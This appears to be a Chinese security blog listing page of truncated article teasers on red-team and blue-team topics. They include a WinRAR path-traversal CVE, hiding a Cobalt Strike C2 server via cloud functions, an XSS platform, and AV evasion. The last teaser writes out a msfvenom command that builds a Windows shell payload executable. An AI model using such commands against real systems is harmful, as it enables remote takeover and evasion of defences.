红蓝对抗必备-TrafficEye-web网络流量分析与威胁检测工具工具
简介 该工具适用于 护网蓝队对网络流量的深入分析,帮助安全研究人员、渗透测试人员及网络管理员等专业人士识别潜在的安全威胁黑客攻击行为等,尤其是针对 Web 应用的攻击(如 SQL 注入、XSS、W...
「这个压缩包有问题吗?」WinRAR漏洞让普通解压操作变成系统沦陷起点-实战漏洞复现:WinRAR CVE-2025-6218
前情提要WinRAR处理压缩包内文件路径时存在逻辑错误,攻击者可构造包含相对路径序列的恶意文件名,解压时文件被释放到预期目录之外的系统关键位置(如启动目录、系统文件夹),绕过安全限制,在你...
浏览器也能当安全工具?抓包从未如此简单:FastBurp——内置AI分析的浏览器安全神器,能抓包、能重放、还能AI分析!
FastBurp - 新一代HTTP请求分析工具🚀 FastBurp 是一款基于浏览器扩展的轻量级HTTP/HTTPS请求拦截、重放、分析和AI辅助安全分析浏览器插件,无需安装额外软件,即开即用。🌟 兼容的浏览器版本...
让黑客手机更智能!在 Kali Nethunter 中玩转 Gemini CLI MCP
前言:各位渗透测试的极客们,想必你们已经体验过Model Context Protocol (MCP) 在电脑上带来的震撼:AI助手直接为你调用nmap、分析扫描结果、撰写Exploit代码……效率飙升的感觉让人上瘾。但当...
让你的手机成为AI安全分析师:在Kali Nethunter使用Gemini MCP实时解析Wireshark流量
引言:当移动渗透测试遇上AI副驾驶在网络安全攻防演练与应急响应现场,安全分析师常常面临这样的困境:手机已装上Kali Nethunter,能抓取无线流量,但面对Wireshark中滚动的海量数据包,人工分...
使用腾讯云函数上线隐藏自己CS
推荐阅读: 1、简介 在我们上线cs时,常会考虑这样一个问题。如果直接暴露cs服务端的IP地址,岂不很危险。于是我们通过云函数来上线我们的CS从而保护服务端IP。对于攻击者而言,隐藏自己的C2是...
Windows折腾笔记之Win11 使用 WSL2 安装 KaliLinux 并安装图形界面
推荐阅读前言不是很想在电脑上装双系统,所以选择使用比较方便的wsl。也不想使用虚拟机,还有大家在初学的时候,需要安装Kal的时候,一般有两个选择。1,虚拟机,对系统影响较小,切换方便。但...
可视化nps内网穿透工具的安装和使用
关于NPSnps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等...
新手第一次渗透测试的分享和小结
说在前面首先很重要的是授权 ~ 首先很重要的是授权 ~ 首先很重要的是授权 ~之前也看过很多关于渗透测试的文章,但是因为一些现实因素等等问题,没(bu)有(gan)真正实操,最近由于一次偶然的机...
【公安神器】XSS+探针+DNSLOG 三合一
一. XSS系统介绍集合 XSS平台+探针平台+DNSLOG平台 = 海鸥系统。相比于其他XSS平台你的有啥优势?1. 支持微信+Email通知2. 一键切换各种类型功能,无需二次插入所有功能全部随意按钮切换,...
免杀技术实际演示
生成反弹shellmsfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe加密编码反弹shellmsfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lpor...
